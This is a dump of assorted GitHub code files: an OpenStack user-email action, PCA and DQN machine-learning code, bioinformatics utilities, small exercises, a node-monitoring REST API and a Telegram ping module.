(self.user_id, self.roles, self.project_id)\n )\n\n\nclass UpdateUserEmailAction(UserIdAction, UserMixin):\n \"\"\"\n Simple action to update a users email address for a given user.\n \"\"\"\n\n required = [\n \"user_id\",\n \"new_email\",\n ]\n\n serializer = serializers.UpdateUserEmailSerializer\n\n def _get_email(self):\n # Sending to new email address\n return self.new_email\n\n def _validate(self):\n self.action.valid = validate_steps(\n [\n self._validate_user,\n self._validate_email_not_in_use,\n ]\n )\n self.action.save()\n\n def _validate_user(self):\n self.user = self._get_target_user()\n if self.user:\n return True\n self.add_note(\"Unable to find target user.\")\n return False\n\n def _validate_email_not_in_use(self):\n if CONF.identity.username_is_email:\n self.domain_id = self.action.task.keystone_user[\"project_domain_id\"]\n\n id_manager = user_store.IdentityManager()\n\n if id_manager.find_user(self.new_email, self.domain_id):\n self.add_note(\"User with same username already exists\")\n return False\n self.add_note(\"No user with same username\")\n return True\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve(True)\n\n def _approve(self):\n self._validate()\n self.action.need_token = True\n self.set_token_fields([\"confirm\"])\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n if token_data[\"confirm\"]:\n self.old_username = str(self.user.name)\n self.update_email(self.new_email, user=self.user)\n\n if CONF.identity.username_is_email:\n self.update_user_name(self.new_email, user=self.user)\n\n self.add_note(\n \"The email for user %s has been changed to %s.\"\n % (self.old_username, self.new_email)\n )\n","repo_name":"openstack/adjutant","sub_path":"adjutant/actions/v1/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":16101,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"1782936217","text":"\n# Code from Chapter 6 of Machine Learning: An Algorithmic Perspective (2nd Edition)\n# by Stephen Marsland (http://stephenmonika.net)\n\n# You are free to use, change, or redistribute the code in any way you wish for\n# non-commercial purposes, but please maintain the name of the original author.\n# This code comes with no warranty of any kind.\n\n# Stephen Marsland, 2008, 2014\n\n# Demonstration of PCA and kernel PCA on the circular dataset\nimport pylab as pl\nimport numpy as np\n\nimport pca\nimport kernelpca\n\ndata = np.zeros((150,2))\n\ntheta = np.random.normal(0,np.pi,50)\nr = np.random.normal(0,0.1,50)\ndata[0:50,0] = r*np.cos(theta)\ndata[0:50,1] = r*np.sin(theta)\n\ntheta = np.random.normal(0,np.pi,50)\nr = np.random.normal(2,0.1,50)\ndata[50:100,0] = r*np.cos(theta)\ndata[50:100,1] = r*np.sin(theta)\n\ntheta = np.random.normal(0,np.pi,50)\nr = np.random.normal(5,0.1,50)\ndata[100:150,0] = r*np.cos(theta)\ndata[100:150,1] = r*np.sin(theta)\n\npl.figure()\npl.plot(data[:50,0],data[:50,1],'ok')\npl.plot(data[50:100,0],data[50:100,1],'^k')\npl.plot(data[100:150,0],data[100:150,1],'vk')\npl.title('Original dataset')\n\nx,y,evals,evecs = pca.pca(data,2)\npl.figure()\npl.plot(x[:50,0],x[:50,1],'ok')\npl.plot(x[50:100,0],x[50:100,1],'^k')\npl.plot(x[100:150,0],x[100:150,1],'vk')\npl.title('Reconstructed points after PCA')\n\npl.figure()\ny = kernelpca.kernelpca(data,'gaussian',2)\npl.plot(y[:50,0],y[:50,1],'ok')\npl.plot(y[50:100,0],y[50:100,1],'^k')\npl.plot(y[100:150,0],y[100:150,1],'vk')\npl.title('Reconstructed points 
after kernel PCA')\n\npl.show()\n","repo_name":"alexsosn/MarslandMLAlgo","sub_path":"Ch6/kpcademo.py","file_name":"kpcademo.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"61"} +{"seq_id":"28374952741","text":"class Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n if s == t:\n return True\n ss = list(s)\n ss.sort()\n tt = list(t)\n tt.sort()\n return ss == tt\n","repo_name":"guodongxiaren/OJ","sub_path":"leetcode/242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"70994857153","text":"import os\n# from typing_extensions import Self\nfrom pandas import wide_to_long\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2' # kill warning about tensorflow\nimport tensorflow as tf\n\"\"\"pip install 'h5py==2.10.0' --force-reinstall\"\"\"\n\nimport numpy as np\nimport sys\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import load_model, clone_model\nfrom tensorflow.keras import backend as K\nfrom pathlib import Path\n\nclass TrainModel:\n def __init__(self, num_layers, width, batch_size, learning_rate, input_dim, output_dim, opt, retrain=None, \n path=None, build=True):\n self._input_dim = input_dim\n self._num_layers = num_layers\n self._width = width\n self._output_dim = output_dim\n self._batch_size = batch_size\n self._learning_rate = learning_rate\n self._opt = opt\n if build:\n self._model = self._build_model(num_layers, width, opt, retrain, path)\n else:\n self._model = None\n\n def change_lr(self,decay,change=False):\n new_lr = self._learning_rate*decay\n if change:\n if new_lr < 0.00001:\n learning_rate = 0.00001\n else:\n learning_rate = new_lr\n self._learning_rate = learning_rate\n K.set_value(self._model.optimizer.learning_rate, learning_rate)\n \n\n def clone(self):\n instance = TrainModel(num_layers=self._num_layers, width=self._width, batch_size=self._batch_size, \n learning_rate=self._learning_rate, input_dim=self._input_dim, output_dim=self._output_dim, opt=self._opt, build=False)\n instance._model = clone_model(self._model)\n return instance\n\n def _build_model(self, num_layers, width, opt, retrain, path, moment = 0.9):\n \"\"\"\n Build and compile a fully connected deep neural network\n \"\"\"\n if retrain:\n model = load_model(path)\n # self._model.save(os.path.join(path, 'trained_model_epi{}.h5'.format(epi)))\n else:\n inputs = keras.Input(shape=(self._input_dim,))\n x = layers.Dense(width, activation='relu')(inputs)\n for _ in range(num_layers):\n x = layers.Dense(width, activation='relu')(x)\n outputs = layers.Dense(self._output_dim)(x)\n model = keras.Model(inputs=inputs, outputs=outputs, name='my_model')\n\n if opt == \"adam\":\n model.compile(loss=losses.mean_squared_error, optimizer=Adam(lr=self._learning_rate))\n elif opt == \"rmsprop\":\n model.compile(loss=losses.mean_squared_error, optimizer=RMSprop(lr=self._learning_rate))\n elif opt == \"sgd\":\n model.compile(loss=losses.mean_squared_error, optimizer=SGD(lr=self._learning_rate, momentum=moment))\n \n return model\n \n def predict_one(self, 
state):\n \"\"\"\n Predict the action values from a single state\n \"\"\"\n state = np.reshape(state, [1, self._input_dim])\n return self._model.predict(state,verbose=0)\n\n\n def predict_batch(self, states):\n \"\"\"\n Predict the action values from a batch of states\n \"\"\"\n return self._model.predict(states, verbose=0)\n\n\n def train_batch(self, states, q_sa):\n \"\"\"\n Train the nn using the updated q-values\n \"\"\"\n self._model.fit(states, q_sa, epochs=1, verbose=0)\n \"\"\"loss = self._model.train_on_batch(states, q_sa)\n print(\"loss\", loss)\"\"\"\n\n def save_model(self, path, epi):\n \"\"\"\n Save the current model in the folder as h5 file and a model architecture summary as png\n \"\"\"\n self._model.save(os.path.join(path, 'trained_model_epi{}.h5'.format(epi)))\n # plot_model(self._model, to_file=os.path.join(path, 'model_structure.png'), show_shapes=True, show_layer_names=True)\n\n\n @property\n def input_dim(self):\n return self._input_dim\n\n\n @property\n def output_dim(self):\n return self._output_dim\n\n\n @property\n def batch_size(self):\n return self._batch_size\n\n\nclass TestModel:\n def __init__(self, input_dim, model_path, epi):\n self._input_dim = input_dim\n self._model = self._load_my_model(model_path, epi)\n\n\n def _load_my_model(self, model_folder_path, epi):\n \"\"\"\n Load the model stored in the folder specified by the model number, if it exists\n \"\"\"\n model_file_path = str(Path(os.path.join(model_folder_path, 'trained_model_epi{}.h5'.format(epi))))\n print(\"model_file_path\",model_file_path)\n if os.path.isfile(model_file_path):\n loaded_model = load_model(model_file_path)\n return loaded_model\n else:\n sys.exit(\"Model number not found\")\n\n\n def predict_one(self, state):\n \"\"\"\n Predict the action values from a single state\n \"\"\"\n state = np.reshape(state, [1, self._input_dim])\n return self._model.predict(state)\n\n\n @property\n def input_dim(self):\n return self._input_dim","repo_name":"linlyu97/Reinforcement-Learning-Approach-for-Intelligent-Traffic-Light-Control","sub_path":"sumo_rl/agents/deep_q/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13277838839","text":"import os\nimport sys\nimport logging\nimport datetime\nimport subprocess\nimport shutil\nimport math\nimport tempfile\n\ndef init_logging(log_heading, logging_level):\n \"\"\"\n Initialize the logging environment and print a header to the log.\n\n :param log_heading: heading for the log\n :return: nothing\n \"\"\"\n logging.basicConfig(format='%(levelname)s\\t%(message)s', level=logging_level, stream=sys.stdout)\n length = math.ceil((len(log_heading)/2))\n logging.info('- ' * length)\n logging.info(log_heading)\n logging.info(datetime.datetime.today().ctime())\n logging.info('- ' * length)\n\n\ndef merge_dicts(dict1, dict2):\n \"\"\"\n Merge two dictionaries into a new dictionary. 
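For example:\n\n    >>> merge_dicts({'a': 1, 'b': 2}, {'b': 3})\n    {'a': 1, 'b': 3}\n\n    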
Keys in the second dictionary\n    overwrite existing keys in the first dictionary.\n\n    :param dict1: first dictionary\n    :param dict2: second dictionary\n    :return: a new dictionary\n    \"\"\"\n    new_dict = {}\n    new_dict.update(dict1)\n    new_dict.update(dict2)\n    return new_dict\n\n\ndef concat_files(file1, file2, new_file):\n    \"\"\"\n    Concatenates two files into a new file.\n\n    :param file1: path to first file\n    :param file2: path to second file\n    :param new_file: path to new concatenated file\n    :return: nothing\n    \"\"\"\n    with open(new_file, 'wb') as nf:\n        with open(file1, 'rb') as f1:\n            shutil.copyfileobj(f1, nf)\n        with open(file2, 'rb') as f2:\n            shutil.copyfileobj(f2, nf)\n\n\ndef can_i_run_software(software):\n    \"\"\"\n    Copied and modified from wgd.utils\n\n    Test if external software is executable\n    :param software: list or string of executable(s)\n    :return: 1 (failure) or 0 (success)\n    \"\"\"\n    if isinstance(software, str):\n        software = [software]\n    ex = 0\n    for s in software:\n        # codeml needs input otherwise it prompts the user for input, so a dummy\n        # file is created\n        if s == 'codeml':\n            tmp_file = \"codeml.ctl\"\n            command = ['codeml', tmp_file]\n        elif s == 'prank':\n            command = [s, '--help']\n        elif s == 'FastTree':\n            command = s\n        elif s in ['blastp', 'makeblastdb', 'blast', 'muscle', 'i-adhore']:\n            command = [s, '-version']\n        else:\n            command = [s, '--version']\n        try:\n            # logging.info(command)\n            if s == \"codeml\":\n                # Since the Nextflow pipeline processes multiple wgd runs at the same time,\n                # let's generate for each run the dummy \"codeml.ctl\" files within a different\n                # temporary directory named with a unique ID. This way, the several parallel\n                # wgd runs will not interfere with each other when creating and removing \n                # the dummy codeml.ctl file.\n                with tempfile.TemporaryDirectory(dir = \".\") as tmp_dir:\n                    with open(os.path.join(tmp_dir, tmp_file), 'w') as o: # write the codeml.ctl file in it\n                        o.write('seqfile = test')\n                    sp = subprocess.run(command, cwd=tmp_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n                    # tmp_dir is removed both if the subprocess succeeds or fails, thanks to the \"with\" statement\n            else:\n                sp = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            \n            out = sp.stdout.decode(\"utf-8\").strip()\n            err = sp.stderr.decode(\"utf-8\").strip()\n            if out:\n                logging.info(out.splitlines()[0])\n            elif err:\n                logging.info(err.splitlines()[0])\n\n        except FileNotFoundError:\n            logging.error('{} executable not found!'.format(s))\n            ex = 1\n    return ex\n\n\n
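# Editor's note -- a minimal, hypothetical usage sketch for the check above\n# (the tool list is illustrative, not taken from the original):\n#\n#     if can_i_run_software(['blastp', 'makeblastdb', 'muscle']) != 0:\n#         logging.error('Please install the missing tools first.')\n\n\n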
def translate_cds(sequence_dict, skip_invalid=False):\n    \"\"\"\n    Copied and modified from wgd.utils\n\n    Just another CDS to protein translator. Will give warnings when in-frame\n    stop codons are found, invalid codons are found, or when the sequence length\n    is not a multiple of three. Will translate the full sequence or until an\n    unspecified or in-frame codon is encountered.\n    :param sequence_dict: dictionary with gene IDs and CDS sequences\n    :param skip_invalid: bool, skip invalid CDS? (default translates to first\n    stop codon or end)\n    :return: dictionary with gene IDs and protein sequences\n    \"\"\"\n    # TODO I should just use the Biopython translator\n    aa_dict = {\n        'ATA': 'I', 'ATC': 'I', 'ATT': 'I', 'ATG': 'M',\n        'ACA': 'T', 'ACC': 'T', 'ACG': 'T', 'ACT': 'T',\n        'AAC': 'N', 'AAT': 'N', 'AAA': 'K', 'AAG': 'K',\n        'AGC': 'S', 'AGT': 'S', 'AGA': 'R', 'AGG': 'R',\n        'CTA': 'L', 'CTC': 'L', 'CTG': 'L', 'CTT': 'L',\n        'CCA': 'P', 'CCC': 'P', 'CCG': 'P', 'CCT': 'P',\n        'CAC': 'H', 'CAT': 'H', 'CAA': 'Q', 'CAG': 'Q',\n        'CGA': 'R', 'CGC': 'R', 'CGG': 'R', 'CGT': 'R',\n        'GTA': 'V', 'GTC': 'V', 'GTG': 'V', 'GTT': 'V',\n        'GCA': 'A', 'GCC': 'A', 'GCG': 'A', 'GCT': 'A',\n        'GAC': 'D', 'GAT': 'D', 'GAA': 'E', 'GAG': 'E',\n        'GGA': 'G', 'GGC': 'G', 'GGG': 'G', 'GGT': 'G',\n        'TCA': 'S', 'TCC': 'S', 'TCG': 'S', 'TCT': 'S',\n        'TTC': 'F', 'TTT': 'F', 'TTA': 'L', 'TTG': 'L',\n        'TAC': 'Y', 'TAT': 'Y', 'TAA': '', 'TAG': '',\n        'TGC': 'C', 'TGT': 'C', 'TGA': '', 'TGG': 'W',\n    }\n    protein_dict = {}\n\n    j = 0\n    total = 0\n    for key, val in sequence_dict.items():\n        j += 1\n        aa_seq = ''\n        if len(val) % 3 != 0:\n            logging.warning('Sequence length != multiple of 3 for {}!'.format(key))\n            total += 1\n        invalid = False\n        for i in range(0, len(val), 3):\n            if val[i:i + 3] not in aa_dict.keys():\n                logging.warning('Invalid codon {0:>3} in {1}'.format(val[i:i+3], key))\n                invalid = True\n                total += 1\n                break\n            else:\n                if aa_dict[val[i:i + 3]] == '' and i+3 != len(val):\n                    logging.warning('In-frame STOP codon in {0} at position {1}:{2}'.format(key, i, i+3))\n                    invalid = True\n                    total += 1\n                    break\n                aa_seq += aa_dict[val[i:i + 3]]\n        if invalid and skip_invalid:\n            continue\n        protein_dict[key] = aa_seq\n\n    if total:\n        logging.warning(\"There were {} warnings during translation\".format(total))\n    return protein_dict\n\n\ndef write_fasta(seq_dict, output_file, id_prefix=None, append=False):\n    \"\"\"\n    Copied and modified from wgd.utils\n\n    Write/append a sequence dictionary to a fasta file.\n    :param seq_dict: sequence dictionary, see :py:func:`read_fasta`\n    :param output_file: output file name\n    :param id_prefix: prefix to add to gene IDs\n    :param append: append to file\n    :return: nothing\n    \"\"\"\n    mode = 'w'\n    if append:\n        mode = 'a'\n    with open(output_file, mode) as o:\n        for key, val in seq_dict.items():\n            if id_prefix and id_prefix != '':\n                o.write('>' + id_prefix + '|' + key + '\\n')\n            else:\n                o.write('>' + key + '\\n')\n            o.write(val + '\\n')\n","repo_name":"altingia/ksrates","sub_path":"ksrates/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
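# Editor's note (not part of the dataset record above): a minimal usage sketch
# showing how the two ksrates helpers compose; the gene ID and output path are
# hypothetical placeholders.
cds = {"gene1": "ATGGCTTGA"}  # ATG GCT TGA -> "MA" (the trailing stop maps to "")
write_fasta(translate_cds(cds, skip_invalid=True), "toy.fasta", id_prefix="sp")
# toy.fasta now contains ">sp|gene1" followed by "MA".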
+{"seq_id":"4019727773","text":"import json\nfrom random import*\nfrom Armory import *\n\n#Lone Wolf - Book 2\n#Kai disciplines\n#0-Camouflage, 1-Hunting, 2-Sixth Sense, 3-Tracking, 4-Healing, 5-Weaponskill, 6-Mindshield, 7-Mindblast, 8-Animal Kinship, 9-Mind Over Matter\n#Weaponskill: 0-Dagger, 1-Spear, 2-Mace, 3-Short Sword, 4-Warhammer, 5-Sword, 6-Battle Axe, 7-Sword, 8-Quarterstaff, 9-Broadsword\n\n@dataclass()\nclass Charakter:\n    head: Equippable\n    body: Equippable\n    main_hand: Weapon\n    off_hand: Equippable\n    page: int\n    fighting_power: int\n    endurance_points: int\n    endurance_points_max: int\n    kai_discipline_max: int\n    food_rations: int\n    wallet: int\n    backpack: []\n    special_items: []\n    kai_disciplines: []\n\n    @classmethod\n    def crate_random(cls):\n        ausdauerpunkte = randint(21,31)\n        return cls(\n            head = Helm,\n            body = None,\n            main_hand = Weapon(BodyPart.MainHand, 2, 0, WeaponType.Broadsword),\n            off_hand= None,\n            page = 0,\n            fighting_power = randint(11,21),\n            endurance_points = ausdauerpunkte,\n            endurance_points_max = ausdauerpunkte,\n            kai_discipline_max = 5,\n            food_rations = 0,\n            wallet = randint(11,21),\n            backpack = [],\n            special_items = [],\n            kai_disciplines = []\n        )\n\n    @classmethod\n    def from_json(cls, character_as_json: str):\n        return cls(\n            head = character_as_json['head'],\n            body = character_as_json['body'],\n            main_hand = character_as_json['main_hand'],\n            off_hand= character_as_json['off_hand'],\n            page = character_as_json[\"page\"],\n            fighting_power = character_as_json[\"fighting_power\"],\n            endurance_points = character_as_json[\"endurance_points\"],\n            endurance_points_max = character_as_json[\"endurance_points_max\"],\n            kai_discipline_max = character_as_json[\"kai_discipline_max\"],\n            food_rations = character_as_json[\"food_rations\"],\n            wallet = character_as_json[\"wallet\"],\n            backpack = character_as_json[\"backpack\"],\n            special_items = character_as_json[\"special_items\"],\n            kai_disciplines = list(map(lambda x: WeaponType[x], character_as_json[\"kai_disciplines\"])),\n        )\n\n    def to_json(self):\n        def convert(o):\n            try:\n                if(isinstance(o, Enum)):\n                    return o.value\n                return o.__dict__\n            except:\n                return None\n\n        return json.dumps(self, default=convert, indent=4, ensure_ascii=False)\n\n\n#TODO: I don't get this.\nwaffenstaerke = [0,0,1,0,0,0,0,0,0,0]\nkai = [1,1,1,0,1,waffenstaerke,1,0,0,0]\n\n#COMBAT SKILL\n# kampfstaerke=16\n# kwolf = kampfstaerke\n\n#ENDURANCE\nausdauer=23\n\n\n#Weapons: 0-Dagger, 1-Spear, 2-Mace, 3-Short Sword, 4-Warhammer, 5-Sword, 6-Battle Axe, 7-Sword, 8-Quarterstaff, 9-Broadsword\n# waffen = [0,0,0,0,0,0,0,0,0,0]\n\n#Backpack\n# gegenstaende = [] #max. 8\n# mahlzeiten = 2\n\n# besondere_gegenstände = ['Karte','Schild']\n# tragbeutel = 13\n\n\n\n","repo_name":"OttoBuck/einsamer-Wolf","sub_path":"Charakter.py","file_name":"Charakter.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
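# Editor's note: a hypothetical round trip with the dataclass above; it assumes
# Armory supplies Helm, Weapon, BodyPart and WeaponType at import time.
hero = Charakter.crate_random()
print(hero.to_json())  # JSON snapshot of the randomly rolled character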
+{"seq_id":"15696977425","text":"roll_list=[]\n\nnum = int(input(\"Enter the number of students: \"))\n\nfor i in range(0, num):\n    roll = int(input(\"Enter the roll no.: \"))\n    roll_list.append(roll)\n\n\ndef linear_search():\n\n    count = 0\n    value = int(input(\"Enter the roll no. to be searched: \"))\n\n    for i in range(num):\n        if roll_list[i] == value:\n            print(\"The value\",roll_list[i],\"is found at index no.:\",i)\n            count+=1\n\n    if count==0:\n        print(\"Roll no. does not exist\")\n\ndef sentinal_search():\n\n    value = int(input(\"Enter the roll no. to be searched: \"))\n    last = roll_list[num-1]\n    roll_list[num-1]=value\n\n    i = 0\n\n    while(roll_list[i]!=value):\n        i+=1\n\n    roll_list[num-1] = last\n\n    if(i 2000):\n        n = int(input())\n        return n\n\ndef lerLed():\n    n = None\n    try:\n        n = float(input())\n    except :\n        pass\n    if (n is None or int(n) < 1 or int(n) > 10**100):\n        return lerLed()\n    return n\n\nqtdTestes = lerQuantidadeDeTestes()\n\nfor i in range(qtdTestes):\n    meuLedLido = input()\n    soma = 0\n    for letraDoLed in meuLedLido: #each led digit here is a string\n        quantidadeDeLedsDestaLetra = leds[int(letraDoLed)] #looking up in my array (database) how many leds are needed to build this digit\n        soma = soma + quantidadeDeLedsDestaLetra #it has to be converted back to int to be used as an index\n    print(str(soma) + ' leds')","repo_name":"nataliaRabelo/URI-Beecrowd","sub_path":"1168.py","file_name":"1168.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
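# Editor's note: a worked instance of the digit-to-LED-count lookup used in the
# record above, assuming the standard seven-segment counts per digit 0..9.
segments = [6, 2, 5, 5, 4, 5, 6, 3, 7, 6]
assert sum(segments[int(ch)] for ch in "115") == 9  # 2 + 2 + 5 leds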
+{"seq_id":"19462794567","text":"import db_compute\nimport payout\n\n#import os\nimport json\nfrom bottle import post, request, response, get, route, static_file\nfrom threading import Thread\nimport datetime\nimport time\n\n@route('/monitor_nodes/', method='GET')\n@route('/monitor_nodes', method='GET')\ndef get_control_panel_index():\n    return static_file(\"control_panel.html\", root=\"monitor_nodes/\")\n\ndef setHeaders():\n    response.content_type = 'application/json'\n    response.headers['Access-Control-Allow-Origin'] = '*'\n    response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n    response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n# List of rewards for last 3 days\n@route('/monitor_nodes/rewards/last3', method='GET')\ndef getRewards3():\n    period_day = 24 * 3600\n    start0 = int(time.time()) - 3 * period_day\n    start = int(start0 / period_day) * period_day\n\n    nodes = db_compute.get_all_daily_sorted_filter_time_rev(start)\n    ret = []\n    try:\n        for n in nodes:\n            time_start = int(n['time_start'])\n            dat = datetime.datetime.utcfromtimestamp(time_start).isoformat()\n            ret.append({\n                'date': dat,\n                'time_start': time_start,\n                'time_end': n['time_end'],\n                'ip': n['ip'],\n                'port': n['port'],\n                'account': n['account'],\n                'net_version': n['net_version'],\n                'count_pos': n['count_pos'],\n                'count_neg': n['count_neg'],\n                'count_nonempty': n['count_nonempty'],\n                'avg_bal': 0.001 * int(1000 * float(n['avg_bal'])),\n                'eligible': n['eligible'],\n                'deny_reason': n['deny_reason'],\n                'reward_elig': n['reward_elig'],\n                'reward_sent': n['reward_sent'],\n                'sent_hash': n['sent_hash'],\n                'sent_time': n['sent_time'],\n            })\n    except:\n        ret = ['ERROR']\n    setHeaders()\n    return json.dumps(ret)\n\n# List of periods for last 6 10-min-periods\n@route('/monitor_nodes/periods/last6', method='GET')\ndef getPeriods6():\n    period = 600\n    now = int(time.time())\n    start = int((now - 6 * period) / period) * period\n    end = int((now + period) / period) * period\n    ret = []\n    try:\n        nodes = db_compute.get_nodes_period_filter_time(start, end)\n        for n in nodes:\n            time_start = int(n['time_start'])\n            dat = datetime.datetime.utcfromtimestamp(time_start).isoformat()\n            ret.append({\n                'date': dat,\n                'time_start': time_start,\n                'time_end': n['time_end'],\n                'count_tot': n['count_tot'],\n                'ip': n['ip'],\n                'port': n['port'],\n                'count': n['count'],\n                'account': n['account'],\n                'avg_bal': 0.001 * int(1000 * float(n['avg_bal'])),\n                'net_version': n['net_version'],\n            })\n    except:\n        ret = ['ERROR']\n    setHeaders()\n    return json.dumps(ret)\n\n# TODO reward for ip/account for last 10 days\n# TODO period for ip for last 3 days\n\n# Sample send callback, used for testing\n# Example: curl -d \"{'id': '1234500017', 'amount': '3', 'block_hash': 'D70BB005723EF4AE3850861FB8819628CD101EE1F3A4FF40808213EB5B99FECF'}\" http://localhost:8090/treasury/sample-send-callback\n@route('/monitor_nodes/send-callback', method='POST')\ndef send_callback():\n    global config\n    setHeaders()\n    postdata = request.body.read().decode('utf8')\n    #print(\"postdata \", postdata)\n    postjson = json.loads(postdata.replace(\"'\", '\"'))\n    #print(\"postjson \", postjson)\n\n    if 'error' in postjson:\n        print('Send callback', 'ERROR', postjson['error'])\n    else:\n        id = ''\n        if 'id' in postjson:\n            id = postjson['id']\n        amount = 0\n        if 'amount' in postjson:\n            amount = postjson['amount']\n        block_hash = ''\n        if 'block_hash' in postjson:\n            block_hash = postjson['block_hash']\n        #print('Send callback', 'id', id, 'amount', amount, 'block_hash', block_hash)\n        payout.payout_callback(id, amount, block_hash)\n","repo_name":"mikroncoin/mikron_restapi_py","sub_path":"monitor_nodes/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71317134273","text":"# print the transposed 3*3 matrix (the initial matrix is entered by the user)\r\nimport numpy as np\r\n\r\nwhile True:\r\n    while True:\r\n        try:\r\n            n, m = int(input('Enter the number of rows: ')), \\\r\n                int(input('Enter the number of columns: '))\r\n            while n != 3 or m != 3: # Check that the size is 3 by 3.\r\n                print('The matrix is not 3 by 3, enter a new size')\r\n                n, m = int(input('Enter the number of rows: ')), \\\r\n                    int(input('Enter the number of columns: '))\r\n            break\r\n        except ValueError: # Validate the input (numbers only)\r\n            print('Enter numbers! ')\r\n    A = np.zeros((n, m), dtype=int) # Initialize the matrix with zeros as the starting matrix\r\n    for i in range(n): # Loop over the rows and columns\r\n        for j in range(m):\r\n            A[i, j] = int(input(f' [{i + 1}, {j + 1}]: '))\r\n    print('Your matrix: ', A)\r\n\r\n    T = np.zeros((n, m), dtype=int) # Initialize a zero matrix; it will become the transposed matrix T\r\n    for i in range(m): # loop assigning the entered matrix to the future transposed one\r\n        for j in range(n):\r\n            T[i, j] = A[j, i] # Swapping the indices yields the transposed matrix.\r\n    print('Transposed matrix: ', T)\r\n    print('Do you want to repeat? Enter yes or anything else')\r\n    answer = input('')\r\n    if answer == 'yes':\r\n        continue\r\n    else:\r\n        break\r\n","repo_name":"tomasolodun/lab8","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23993155249","text":"import logging\nimport time\n\nfrom telethon.tl.types import Message\n\nfrom .. 
import loader\nfrom ..inline.types import InlineCall, InlineQuery\n\nlogger = logging.getLogger(__name__)\n\n\n@loader.tds\nclass PingerMod(loader.Module):\n    \"\"\"Inline Pinger For Test\"\"\"\n\n    strings = {\n        \"name\": \"InlinePing\",\n        \"results_ping\": \"✨ Telegram ping: {} ms\"\n    }\n\n    strings_ru = {\"results_ping\": \"✨ Скорость отклика Telegram: {} ms\"}\n\n    @loader.command(ru_doc=\"Проверить скорость отклика юзербота\")\n    async def iping(self, message: Message):\n        \"\"\"Test your userbot ping\"\"\"\n        start = time.perf_counter_ns()\n\n        await self.inline.form(\n            self.strings(\"results_ping\").format(\n                round((time.perf_counter_ns() - start) / 10**3, 3),\n            ),\n            reply_markup=[[{\"text\": \"⏱️ Проверить ещё раз\", \"callback\": self.ladno}]],\n            message=message,\n        )\n\n    async def ladno(self, call: InlineCall):\n        start = time.perf_counter_ns()\n        await call.edit(\n            self.strings(\"results_ping\").format(\n                round((time.perf_counter_ns() - start) / 10**3, 3),\n            ),\n            reply_markup=[[{\"text\": \"⏱️ Проверить ещё раз\", \"callback\": self.ladno}]],\n        )\n\n    async def ping_inline_handler(self, query: InlineQuery):\n        \"\"\"Test your userbot ping\"\"\"\n        start = time.perf_counter_ns()\n        ping = self.strings(\"results_ping\").format(\n            round((time.perf_counter_ns() - start) / 10**3, 3),\n        )\n        button = [{\n            \"text\": \"⏱️ Проверить ещё раз\",\n            \"callback\": self.ladno\n        }]\n        return {\n            \"title\": \"Пинг\",\n            \"description\": \"Нажми сюда\",\n            \"thumb\": \"https://te.legra.ph/file/5d8c7f1960a3e126d916a.jpg\",\n            \"message\": ping,\n            \"reply_markup\": button,\n        }","repo_name":"drenix-drenix/modules","sub_path":"InlinePing.py","file_name":"InlinePing.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32074057815","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 14 14:50:50 2023\n\n@author: phili\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Plotting_obs:\n    def __init__(self,obs_obj):\n        #INPUT:\n        #obs_obj is created with the class Observations in the file get_observations.py\n        self.obs_obj = obs_obj\n        self.obs_dic = obs_obj.data_dic\n        self.nights = obs_obj.get_dates()\n        \n    def plot_vis(self,axis,units,night = None):\n        formatted_night = f'{night.day}/{night.month}/{night.year}'\n        night_dic = self.obs_obj.get_data_by_night(night)\n        \n        baselines = night_dic['baselines']\n        vis2 = night_dic['Vis2']\n        vis2_err = night_dic['Vis2_err']\n        \n        if units == 'm':\n            im1 = axis.scatter(baselines,vis2, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n            axis.set_ylim(0.85,1.15)\n            axis.set_title(f'Vis2 for the night of the {formatted_night}')\n            axis.errorbar(baselines,vis2, yerr=vis2_err,ecolor='darkgrey', linestyle='', marker=None, mew=0)#,**error_kwargs )\n            axis.set_xlabel(r'B (m)')\n            axis.set_ylabel(r'Vis2')\n        else:\n            freqs = baselines/np.array(night_dic['wave_vis'])\n            im1 = axis.scatter(freqs,vis2, c= 